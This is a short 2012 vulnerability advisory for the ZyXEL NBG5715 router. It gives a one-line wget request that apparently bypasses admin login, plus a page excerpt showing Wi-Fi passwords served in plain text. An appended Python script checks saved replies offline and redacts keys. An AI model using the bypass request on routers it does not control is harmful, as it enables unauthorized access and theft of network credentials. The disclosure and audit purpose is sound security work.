==================================================================================================
Zyxel NBG5715
Simultaneous Dual-Band Wireless N900 Media Router
Local admin privileges bypass and Local Wireless Plain Text Password Disclosure
Firmware Version Affected: NBG5715_1.00
Release Date: 20 November 2012
Discovered by: drwxrwxrwx <drwxrwxrwx@linuxmail.org>
Vendor: ZyXEL
Products Affected: NBG5715
==================================================================================================
VULN: Local admin privileges bypass by requesting: wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap#
==================================================================================================
DATA:
<title>.::Welcome to ZyXEL NBG5715::.</title>
with ( document.forms[0] ){
/* 2.4G */
if(wlanRadio.selectedIndex == 0){
wlanSSID.value = "Defaultssid";
wlanSec.selectedIndex = 2;
wlanPwd.value = "thedefaultpassword";
}
else{ /* 5G */
wlanSSID.value = "Defaultssid";
wlanSec.selectedIndex = 2;
wlanPwd.value = "thedefaultpassword";
}
changeSec();
}
}
==================================================================================================
Gretz
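
A response check an owner can run against a saved reply from their own unit to confirm whether its firmware shows this behaviour, added here as an example (not code from the advisory or from ZyXEL). It works offline; the function names and the LOGIN_REQUIRED body are assumptions for illustration, and AFFECTED is constructed from the DATA excerpt above.

```python
import re

# Markers taken from the response excerpt in the advisory.
ADMIN_TITLE = re.compile(r"<title>\.::Welcome to ZyXEL NBG5715::\.</title>")
FIELD = re.compile(r'\b(wlanSSID|wlanPwd)\.value\s*=\s*"((?:[^"\\]|\\.)*)"')


def redact(secret):
    """Keep only the length so audit reports never carry the key itself."""
    return "<redacted, %d chars>" % len(secret)


def audit_response(status, body):
    """Classify a reply to a request for the network map page made without a login.

    admin_page_served: the admin UI came back; plaintext_passwords: count of
    non-empty wlanPwd values; evidence: fields found, with keys redacted.
    """
    served = status == 200 and bool(ADMIN_TITLE.search(body))
    evidence, secrets = [], 0
    if served:
        for name, value in FIELD.findall(body):
            if name == "wlanPwd":
                if value:
                    secrets += 1
                value = redact(value)
            evidence.append((name, value))
    return {"admin_page_served": served,
            "plaintext_passwords": secrets,
            "evidence": evidence}


# Constructed sample bodies: the first mirrors the DATA excerpt, the second
# is a hypothetical reply from a device that asks for a login instead.
AFFECTED = '''<title>.::Welcome to ZyXEL NBG5715::.</title>
if(wlanRadio.selectedIndex == 0){
wlanSSID.value = "Defaultssid";
wlanPwd.value = "thedefaultpassword";
}
else{ /* 5G */
wlanSSID.value = "Defaultssid";
wlanPwd.value = "thedefaultpassword";
}'''
LOGIN_REQUIRED = "<title>Login</title><form action='/cgi-bin/luci'>"

if __name__ == "__main__":
    print(audit_response(200, AFFECTED))
    print(audit_response(200, LOGIN_REQUIRED))
```

A result with admin_page_served true and plaintext_passwords above zero means the unit behaves as described for NBG5715_1.00.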